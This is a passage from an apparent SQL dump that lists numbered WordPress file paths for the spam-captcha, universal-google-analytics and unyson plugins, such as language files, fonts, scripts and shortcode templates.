ore/lang/SL_framework-pt_BR.po'),(1228,'wp-content/plugins/spam-captcha/core/lang/SL_framework-pt_PT.mo'),(1229,'wp-content/plugins/spam-captcha/core/lang/SL_framework-pt_PT.po'),(1230,'wp-content/plugins/spam-captcha/core/lang/SL_framework-ro_RO.mo'),(1231,'wp-content/plugins/spam-captcha/core/lang/SL_framework-ro_RO.po'),(1232,'wp-content/plugins/spam-captcha/core/lang/SL_framework-ru_RU.mo'),(1233,'wp-content/plugins/spam-captcha/core/lang/SL_framework-ru_RU.po'),(1234,'wp-content/plugins/spam-captcha/core/lang/SL_framework-th_TH.mo'),(1235,'wp-content/plugins/spam-captcha/core/lang/SL_framework-th_TH.po'),(1236,'wp-content/plugins/spam-captcha/core/lang/SL_framework-tr_TR.mo'),(1237,'wp-content/plugins/spam-captcha/core/lang/SL_framework-tr_TR.po'),(1238,'wp-content/plugins/spam-captcha/core/lang/SL_framework-uk_UA.mo'),(1239,'wp-content/plugins/spam-captcha/core/lang/SL_framework-uk_UA.po'),(1240,'wp-content/plugins/spam-captcha/core/lang/SL_framework-vi_VN.mo'),(1241,'wp-content/plugins/spam-captcha/core/lang/SL_framework-vi_VN.po'),(1242,'wp-content/plugins/spam-captcha/core/lang/SL_framework-zh_CN.mo'),(1243,'wp-content/plugins/spam-captcha/core/lang/SL_framework-zh_CN.po'),(1244,'wp-content/plugins/spam-captcha/core/lang/SL_framework.pot'),(1245,'wp-content/plugins/spam-captcha/core/lang/wp_lang_3.3.1.ini'),(1246,'wp-content/plugins/spam-captcha/core/lang/wp_lang_3.5.ini'),(1247,'wp-content/plugins/spam-captcha/core/lang/wp_lang_3.5.ini.tmp'),(1248,'wp-content/plugins/spam-captcha/core/otherplugins.class.php'),(1249,'wp-content/plugins/spam-captcha/core/parameters.class.php'),(1250,'wp-content/plugins/spam-captcha/core/popup.class.php'),(1251,'wp-content/plugins/spam-captcha/core/progress_bar.class.php'),(1252,'wp-content/plugins/spam-captcha/core/tabs.class.php'),(1253,'wp-content/plugins/spam-captcha/core/templates/css/css_admin.css'),(1254,'wp-content/plugins/spam-captcha/core/templates/css/css_front.css'),(1255,'wp-content/plugins/spam-captcha/core/templates/js/js_admin.js'),(1256,'wp-content/plugins/spam-captcha/core/templates/js/js_front.js'),(1257,'wp-content/plugins/spam-captcha/core/templates/my-plugin.php'),(1258,'wp-content/plugins/spam-captcha/core/templates/readme.txt'),(1259,'wp-content/plugins/spam-captcha/core/text_diff.class.php'),(1260,'wp-content/plugins/spam-captcha/core/translation.class.php'),(1261,'wp-content/plugins/spam-captcha/core/translation.inc.php'),(1262,'wp-content/plugins/spam-captcha/core/tree.class.php'),(1263,'wp-content/plugins/spam-captcha/core/utils.class.php'),(1264,'wp-content/plugins/spam-captcha/core.class.php'),(1265,'wp-content/plugins/spam-captcha/core.nfo'),(1266,'wp-content/plugins/spam-captcha/core.php'),(1267,'wp-content/plugins/spam-captcha/css/css_admin.css'),(1268,'wp-content/plugins/spam-captcha/css/css_front.css'),(1269,'wp-content/plugins/spam-captcha/font-1.ttf'),(1270,'wp-content/plugins/spam-captcha/font-10.ttf'),(1271,'wp-content/plugins/spam-captcha/font-11.ttf'),(1272,'wp-content/plugins/spam-captcha/font-2.ttf'),(1273,'wp-content/plugins/spam-captcha/font-3.ttf'),(1274,'wp-content/plugins/spam-captcha/font-5.ttf'),(1275,'wp-content/plugins/spam-captcha/font-8.ttf'),(1276,'wp-content/plugins/spam-captcha/img/banner-1544x500.png'),(1277,'wp-content/plugins/spam-captcha/img/banner-772x250.png'),(1278,'wp-content/plugins/spam-captcha/img/error.png'),(1279,'wp-content/plugins/spam-captcha/img/icon-128x128.png'),(1280,'wp-content/plugins/spam-captcha/img/icon-256x256.png'),(1281,'wp-content/plugins/spam-captcha/js/elycharts.min.js'),(1282,'wp-content/plugins/spam-captcha/js/js_admin.js'),(1283,'wp-content/plugins/spam-captcha/js/js_front.js'),(1284,'wp-content/plugins/spam-captcha/js/raphael-min.js'),(1285,'wp-content/plugins/spam-captcha/lang/spam_captcha-az_AZ.mo'),(1286,'wp-content/plugins/spam-captcha/lang/spam_captcha-az_AZ.po'),(1287,'wp-content/plugins/spam-captcha/lang/spam_captcha-cs_CZ.mo'),(1288,'wp-content/plugins/spam-captcha/lang/spam_captcha-cs_CZ.po'),(1289,'wp-content/plugins/spam-captcha/lang/spam_captcha-de_DE.mo'),(1290,'wp-content/plugins/spam-captcha/lang/spam_captcha-de_DE.po'),(1291,'wp-content/plugins/spam-captcha/lang/spam_captcha-es_ES.mo'),(1292,'wp-content/plugins/spam-captcha/lang/spam_captcha-es_ES.po'),(1293,'wp-content/plugins/spam-captcha/lang/spam_captcha-es_MX.mo'),(1294,'wp-content/plugins/spam-captcha/lang/spam_captcha-es_MX.po'),(1295,'wp-content/plugins/spam-captcha/lang/spam_captcha-fa_IR.mo'),(1296,'wp-content/plugins/spam-captcha/lang/spam_captcha-fa_IR.po'),(1297,'wp-content/plugins/spam-captcha/lang/spam_captcha-fi_FI.mo'),(1298,'wp-content/plugins/spam-captcha/lang/spam_captcha-fi_FI.po'),(1299,'wp-content/plugins/spam-captcha/lang/spam_captcha-fr_FR.mo'),(1300,'wp-content/plugins/spam-captcha/lang/spam_captcha-fr_FR.po'),(1301,'wp-content/plugins/spam-captcha/lang/spam_captcha-it_IT.mo'),(1302,'wp-content/plugins/spam-captcha/lang/spam_captcha-it_IT.po'),(1303,'wp-content/plugins/spam-captcha/lang/spam_captcha-ja_JP.mo'),(1304,'wp-content/plugins/spam-captcha/lang/spam_captcha-ja_JP.po'),(1305,'wp-content/plugins/spam-captcha/lang/spam_captcha-lt_LT.mo'),(1306,'wp-content/plugins/spam-captcha/lang/spam_captcha-lt_LT.po'),(1307,'wp-content/plugins/spam-captcha/lang/spam_captcha-nl_NL.mo'),(1308,'wp-content/plugins/spam-captcha/lang/spam_captcha-nl_NL.po'),(1309,'wp-content/plugins/spam-captcha/lang/spam_captcha-no_NO.mo'),(1310,'wp-content/plugins/spam-captcha/lang/spam_captcha-no_NO.po'),(1311,'wp-content/plugins/spam-captcha/lang/spam_captcha-pl_PL.mo'),(1312,'wp-content/plugins/spam-captcha/lang/spam_captcha-pl_PL.po'),(1313,'wp-content/plugins/spam-captcha/lang/spam_captcha-pt_BR.mo'),(1314,'wp-content/plugins/spam-captcha/lang/spam_captcha-pt_BR.po'),(1315,'wp-content/plugins/spam-captcha/lang/spam_captcha-ru_RU.mo'),(1316,'wp-content/plugins/spam-captcha/lang/spam_captcha-ru_RU.po'),(1317,'wp-content/plugins/spam-captcha/lang/spam_captcha-tr_TR.mo'),(1318,'wp-content/plugins/spam-captcha/lang/spam_captcha-tr_TR.po'),(1319,'wp-content/plugins/spam-captcha/lang/spam_captcha-vi_VN.mo'),(1320,'wp-content/plugins/spam-captcha/lang/spam_captcha-vi_VN.po'),(1321,'wp-content/plugins/spam-captcha/lang/spam_captcha-zh_CN.mo'),(1322,'wp-content/plugins/spam-captcha/lang/spam_captcha-zh_CN.po'),(1323,'wp-content/plugins/spam-captcha/lang/spam_captcha-zh_TW.mo'),(1324,'wp-content/plugins/spam-captcha/lang/spam_captcha-zh_TW.po'),(1325,'wp-content/plugins/spam-captcha/lang/spam_captcha.pot'),(1326,'wp-content/plugins/spam-captcha/readme.txt'),(1327,'wp-content/plugins/spam-captcha/screenshot-1.png'),(1328,'wp-content/plugins/spam-captcha/screenshot-2.png'),(1329,'wp-content/plugins/spam-captcha/screenshot-3.png'),(1330,'wp-content/plugins/spam-captcha/screenshot-4.png'),(1331,'wp-content/plugins/spam-captcha/screenshot-5.png'),(1332,'wp-content/plugins/spam-captcha/spam-captcha.php'),(1333,'wp-content/plugins/spam-captcha/todo.txt'),(1334,'wp-content/plugins/universal-google-analytics/images/brontobytes.svg'),(1335,'wp-content/plugins/universal-google-analytics/index.php'),(1336,'wp-content/plugins/universal-google-analytics/universal-google-analytics.php'),(1337,'wp-content/plugins/unyson/framework/LICENSE'),(1338,'wp-content/plugins/unyson/framework/bin/load-latest-fonts.php'),(1339,'wp-content/plugins/unyson/framework/bootstrap-helpers.php'),(1340,'wp-content/plugins/unyson/framework/bootstrap.php'),(1341,'wp-content/plugins/unyson/framework/core/Fw.php'),(1342,'wp-content/plugins/unyson/framework/core/class-fw-manifest.php'),(1343,'wp-content/plugins/unyson/framework/core/components/backend.php'),(1344,'wp-content/plugins/unyson/framework/core/components/extensions/class-fw-extension-default.php'),(1345,'wp-content/plugins/unyson/framework/core/components/extensions/manager/available-extensions.php'),(1346,'wp-content/plugins/unyson/framework/core/components/extensions/manager/class--fw-extensions-manager.php'),(1347,'wp-content/plugins/unyson/framework/core/components/extensions/manager/includes/class--fw-extensions-delete-upgrader-skin.php'),(1348,'wp-content/plugins/unyson/framework/core/components/extensions/manager/includes/class--fw-extensions-install-upgrader-skin.php'),(1349,'wp-content/plugins/unyson/framework/core/components/extensions/manager/includes/parsedown/LICENSE.txt'),(1350,'wp-content/plugins/unyson/framework/core/components/extensions/manager/includes/parsedown/Parsedown.php'),(1351,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/extension-page.css'),(1352,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/extension-page.js'),(1353,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/extensions-page.css'),(1354,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/extensions-page.js'),(1355,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/disabled-bg.png'),(1356,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnail-bg.jpg'),(1357,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/analytics.jpg'),(1358,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/backup.jpg'),(1359,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/backups.jpg'),(1360,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/breadcrumbs.jpg'),(1361,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/events.jpg'),(1362,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/feedback.jpg'),(1363,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/forms.jpg'),(1364,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/index.html'),(1365,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/learning.jpg'),(1366,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/mailer.jpg'),(1367,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/mega-menu.jpg'),(1368,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/page-builder.jpg'),(1369,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/portfolio.jpg'),(1370,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/seo.jpg'),(1371,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/sidebars.jpg'),(1372,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/sliders.jpg'),(1373,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/social.jpg'),(1374,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/styling.jpg'),(1375,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/translation.jpg'),(1376,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/wp-shortcodes.jpg'),(1377,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/unyson-font-icon/fonts/icomoon.eot'),(1378,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/unyson-font-icon/fonts/icomoon.svg'),(1379,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/unyson-font-icon/fonts/icomoon.ttf'),(1380,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/unyson-font-icon/fonts/icomoon.woff'),(1381,'wp-content/plugins/unyson/framework/core/components/extensions/manager/static/unyson-font-icon/style.css'),(1382,'wp-content/plugins/unyson/framework/core/components/extensions/manager/views/delete-form.php'),(1383,'wp-content/plugins/unyson/framework/core/components/extensions/manager/views/extension-page-header.php'),(1384,'wp-content/plugins/unyson/framework/core/components/extensions/manager/views/extension.php'),(1385,'wp-content/plugins/unyson/framework/core/components/extensions/manager/views/extensions-page.php'),(1386,'wp-content/plugins/unyson/framework/core/components/extensions/manager/views/install-form.php'),(1387,'wp-content/plugins/unyson/framework/core/components/extensions.php'),(1388,'wp-content/plugins/unyson/framework/core/components/theme.php'),(1389,'wp-content/plugins/unyson/framework/core/extends/class-fw-container-type.php'),(1390,'wp-content/plugins/unyson/framework/core/extends/class-fw-extension.php'),(1391,'wp-content/plugins/unyson/framework/core/extends/class-fw-option-type.php'),(1392,'wp-content/plugins/unyson/framework/core/extends/interface-fw-option-handler.php'),(1393,'wp-content/plugins/unyson/framework/extensions/analytics/class-fw-extension-analytics.php'),(1394,'wp-content/plugins/unyson/framework/extensions/analytics/helpers.php'),(1395,'wp-content/plugins/unyson/framework/extensions/analytics/hooks.php'),(1396,'wp-content/plugins/unyson/framework/extensions/analytics/manifest.php'),(1397,'wp-content/plugins/unyson/framework/extensions/analytics/settings-options.php'),(1398,'wp-content/plugins/unyson/framework/extensions/analytics/views/view.php'),(1399,'wp-content/plugins/unyson/framework/extensions/backups/class-fw-extension-backups.php'),(1400,'wp-content/plugins/unyson/framework/extensions/backups/config.php'),(1401,'wp-content/plugins/unyson/framework/extensions/backups/extensions/backups-demo/class-fw-extension-backups-demo.php'),(1402,'wp-content/plugins/unyson/framework/extensions/backups/extensions/backups-demo/helpers.php'),(1403,'wp-content/plugins/unyson/framework/extensions/backups/extensions/backups-demo/includes/entity/class-fw-ext-backups-demo.php'),(1404,'wp-content/plugins/unyson/framework/extensions/backups/extensions/backups-demo/manifest.php'),(1405,'wp-content/plugins/unyson/framework/extensions/backups/extensions/backups-demo/static/page.js'),(1406,'wp-content/plugins/unyson/framework/extensions/backups/extensions/backups-demo/views/page.php'),(1407,'wp-content/plugins/unyson/framework/extensions/backups/extensions/backups-demo/views/status.php'),(1408,'wp-content/plugins/unyson/framework/extensions/backups/helpers.php'),(1409,'wp-content/plugins/unyson/framework/extensions/backups/hooks.php'),(1410,'wp-content/plugins/unyson/framework/extensions/backups/includes/list-table/class--fw-ext-backups-list-table.php'),(1411,'wp-content/plugins/unyson/framework/extensions/backups/includes/log/init.php'),(1412,'wp-content/plugins/unyson/framework/extensions/backups/includes/log/scripts.js'),(1413,'wp-content/plugins/unyson/framework/extensions/backups/includes/log/view.php'),(1414,'wp-content/plugins/unyson/framework/extensions/backups/includes/module/class--fw-ext-backups-module.php'),(1415,'wp-content/plugins/unyson/framework/extensions/backups/includes/module/schedule/class--fw-ext-backups-module-schedule.php'),(1416,'wp-content/plugins/unyson/framework/extensions/backups/includes/module/schedule/settings-options.php'),(1417,'wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/class--fw-ext-backups-module-tasks.php'),(1418,'wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/class--fw-ext-backups-task-register.php'),(1419,'wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/class-fw-ext-backups-task-type.php'),(1420,'wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/entity/class-fw-ext-backups-task-collection.php'),(1421,'wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/entity/class-fw-ext-backups-task.php'),(1422,'wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/class-fw-ext-backups-task-type-db-export.php'),(1423,'wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/class-fw-ext-backups-task-type-db-restore.php'),(1424,'wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/class-fw-ext-backups-task-type-dir-clean.php'),(1425,'wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/class-fw-ext-backups-task-type-files-export.php'),(1426,'wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/class-fw-ext-backups-task-type-files-restore.php'),(1427,'wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/class-fw-ext-backups-task-type-image-sizes-remove.php'),(1428,'wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/class-fw-ext-backups-task-type-image-sizes-restore.php'),(1429,'wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/class-fw-ext-backups-task-type-unzip.php'),(1430,'wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/class-fw-ext-backups-task-type-zip.php'),(1431,'wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/download/class-fw-ext-backups-task-type-download-type-register.php'),(1432,'wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/download/class-fw-ext-backups-task-type-download-type.php'),(1433,'wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/download/class-fw-ext-backups-task-type-download.php'),(1434,'wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/download/type/class-fw-ext-backups-task-type-download-local.php'),(1435,'wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/download/type/piecemeal/class-fw-ext-backups-task-type-download-piecemeal.php'),(1436,'wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/download/type/piecemeal/server/config.php'),(1437,'wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/download/type/piecemeal/server/index.php'),(1438,'wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/init.php'),(1439,'wp-content/plugins/unyson/framework/extensions/backups/manifest.php'),(1440,'wp-content/plugins/unyson/framework/extensions/backups/static/scripts.js'),(1441,'wp-content/plugins/unyson/framework/extensions/backups/views/archives.php'),(1442,'wp-content/plugins/unyson/framework/extensions/backups/views/page.php'),(1443,'wp-content/plugins/unyson/framework/extensions/backups/views/tasks-status.php'),(1444,'wp-content/plugins/unyson/framework/extensions/blog/class-fw-extension-blog.php'),(1445,'wp-content/plugins/unyson/framework/extensions/blog/manifest.php'),(1446,'wp-content/plugins/unyson/framework/extensions/breadcrumbs/class-fw-extension-breadcrumbs.php'),(1447,'wp-content/plugins/unyson/framework/extensions/breadcrumbs/helpers.php'),(1448,'wp-content/plugins/unyson/framework/extensions/breadcrumbs/includes/class-breadcrumbs-builder.php'),(1449,'wp-content/plugins/unyson/framework/extensions/breadcrumbs/manifest.php'),(1450,'wp-content/plugins/unyson/framework/extensions/breadcrumbs/readme.md.php'),(1451,'wp-content/plugins/unyson/framework/extensions/breadcrumbs/settings-options.php'),(1452,'wp-content/plugins/unyson/framework/extensions/breadcrumbs/static.php'),(1453,'wp-content/plugins/unyson/framework/extensions/breadcrumbs/views/breadcrumbs.php'),(1454,'wp-content/plugins/unyson/framework/extensions/breadcrumbs/views/index.html'),(1455,'wp-content/plugins/unyson/framework/extensions/builder/class-fw-extension-builder.php'),(1456,'wp-content/plugins/unyson/framework/extensions/builder/config.php'),(1457,'wp-content/plugins/unyson/framework/extensions/builder/helpers.php'),(1458,'wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/builder.php'),(1459,'wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/extends/class-fw-option-type-builder-item.php'),(1460,'wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/extends/class-fw-option-type-builder.php'),(1461,'wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/includes/fullscreen.php'),(1462,'wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/includes/templates/class-fw-ext-builder-templates-component.php'),(1463,'wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/includes/templates/class-fw-ext-builder-templates.php'),(1464,'wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/includes/templates/components/full/class-fw-ext-builder-templates-component-full.php'),(1465,'wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/includes/templates/components/full/init.php'),(1466,'wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/includes/templates/components/full/scripts.js'),(1467,'wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/includes/templates/init.php'),(1468,'wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/includes/templates/static/scripts.js'),(1469,'wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/static/js/builder.js'),(1470,'wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/static/js/fullscreen.js'),(1471,'wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/static/js/helpers.js'),(1472,'wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/static/js/history.js'),(1473,'wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/static/js/initialize-builder.js'),(1474,'wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/static/js/qtips.js'),(1475,'wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/view.php'),(1476,'wp-content/plugins/unyson/framework/extensions/builder/includes/sub-includes.php'),(1477,'wp-content/plugins/unyson/framework/extensions/builder/manifest.php'),(1478,'wp-content/plugins/unyson/framework/extensions/builder/static.php'),(1479,'wp-content/plugins/unyson/framework/extensions/shortcodes/class-fw-extension-shortcodes.php'),(1480,'wp-content/plugins/unyson/framework/extensions/shortcodes/extensions/wp-shortcodes/class-fw-extension-wp-shortcodes.php'),(1481,'wp-content/plugins/unyson/framework/extensions/shortcodes/extensions/wp-shortcodes/manifest.php'),(1482,'wp-content/plugins/unyson/framework/extensions/shortcodes/extensions/wp-shortcodes/static/js/plugin.js'),(1483,'wp-content/plugins/unyson/framework/extensions/shortcodes/extensions/wp-shortcodes/static.php'),(1484,'wp-content/plugins/unyson/framework/extensions/shortcodes/helpers.php'),(1485,'wp-content/plugins/unyson/framework/extensions/shortcodes/includes/class-fw-shortcode.php'),(1486,'wp-content/plugins/unyson/framework/extensions/shortcodes/includes/class-fw-shortcodes-loader.php'),(1487,'wp-content/plugins/unyson/framework/extensions/shortcodes/includes/coder/class-fw-ext-shortcodes-attr-coder-aggressive.php'),(1488,'wp-content/plugins/unyson/framework/extensions/shortcodes/includes/coder/class-fw-ext-shortcodes-attr-coder-json.php'),(1489,'wp-content/plugins/unyson/framework/extensions/shortcodes/includes/coder/class-fw-ext-shortcodes-attr-coder-post-meta.php'),(1490,'wp-content/plugins/unyson/framework/extensions/shortcodes/includes/coder/interface-fw-ext-shortcodes-attr-coder.php'),(1491,'wp-content/plugins/unyson/framework/extensions/shortcodes/includes/shortcode-template-components.php'),(1492,'wp-content/plugins/unyson/framework/extensions/shortcodes/manifest.php'),(1493,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/accordion/config.php'),(1494,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/accordion/options.php'),(1495,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/accordion/static/js/scripts.js'),(1496,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/accordion/static.php'),(1497,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/accordion/views/view.php'),(1498,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/button/config.php'),(1499,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/button/options.php'),(1500,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/button/static.php'),(1501,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/button/views/view.php'),(1502,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/class-fw-shortcode-calendar.php'),(1503,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/config.php'),(1504,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/options.php'),(1505,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/static/js/calendar.js'),(1506,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/static/js/scripts.js'),(1507,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/static/libs/bootstrap3/js/bootstrap.js'),(1508,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/static/libs/bootstrap3/js/bootstrap.min.js'),(1509,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/static/libs/jstimezonedetect/jstz.js'),(1510,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/static/libs/jstimezonedetect/jstz.min.js'),(1511,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/static.php'),(1512,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/views/day.html'),(1513,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/views/events-list.html'),(1514,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/views/month-day.html'),(1515,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/views/month.html'),(1516,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/views/view.php'),(1517,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/views/week-days.html'),(1518,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/views/week.html'),(1519,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/call-to-action/config.php'),(1520,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/call-to-action/options.php'),(1521,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/call-to-action/static.php'),(1522,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/call-to-action/views/view.php'),(1523,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/column/class-fw-shortcode-column.php'),(1524,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/column/includes/page-builder-column-item/class-page-builder-column-item.php'),(1525,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/column/includes/page-builder-column-item/static/js/scripts.js'),(1526,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/column/includes/template-component/class-fw-ext-builder-templates-component-column.php'),(1527,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/column/includes/template-component/init.php'),(1528,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/column/includes/template-component/scripts.js'),(1529,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/column/static.php'),(1530,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/column/views/view.php'),(1531,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/divider/config.php'),(1532,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/divider/options.php'),(1533,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/divider/static.php'),(1534,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/divider/views/view.php'),(1535,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/icon/config.php'),(1536,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/icon/options.php'),(1537,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/icon/static.php'),(1538,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/icon/views/view.php'),(1539,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/icon-box/config.php'),(1540,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/icon-box/options.php'),(1541,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/icon-box/static.php'),(1542,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/icon-box/views/view.php'),(1543,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/map/class-fw-shortcode-map.php'),(1544,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/map/config.php'),(1545,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/map/options.php'),(1546,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/map/static/js/scripts.js'),(1547,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/map/static.php'),(1548,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/map/views/view.php'),(1549,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/media-image/config.php'),(1550,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/media-image/options.php'),(1551,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/media-image/views/view.php'),(1552,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/media-video/config.php'),(1553,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/media-video/options.php'),(1554,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/media-video/views/view.php'),(1555,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/notification/config.php'),(1556,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/notification/options.php'),(1557,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/notification/static.php'),(1558,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/notification/views/view.php'),(1559,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/row/class-fw-shortcode-row.php'),(1560,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/row/includes/page-builder-row-item/class-page-builder-row-item.php'),(1561,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/row/static.php'),(1562,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/row/views/view.php'),(1563,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/class-fw-shortcode-section.php'),(1564,'wp-content/plugins/unyso